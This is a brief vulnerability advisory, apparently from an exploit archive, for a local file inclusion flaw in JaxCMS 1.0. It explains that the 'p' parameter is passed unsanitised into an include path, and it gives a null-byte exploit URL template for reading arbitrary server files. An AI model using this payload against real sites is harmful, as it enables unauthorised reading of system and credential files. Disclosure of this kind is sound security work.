JaxCMS version 1.0 suffers from a local file inclusion vulnerability.
29a0319aa46221f5065686f0eb18e5ce7880bf4e7ccf6b4113a71a2fc52c7b6c
/*
Name : JaxCMS (p) Local File Include
WebSite : http://www.pixiescripts.com/
Demo : http://www.pixiescripts.com/demo/JaxCMS1.0/
Author : Hamza 'MizoZ' N.
Email : mizozx@gmail.com
Greetz : Zuka !
*/
The vulnerability is in the get $_GET['p'] , the index.php include
'/pages/'.$_GET['p'].'.php'
So we can read any file in the server .
EXPLOIT :
[HOST]/[JaxCMS PATH]/index.php?p=[LFI]%00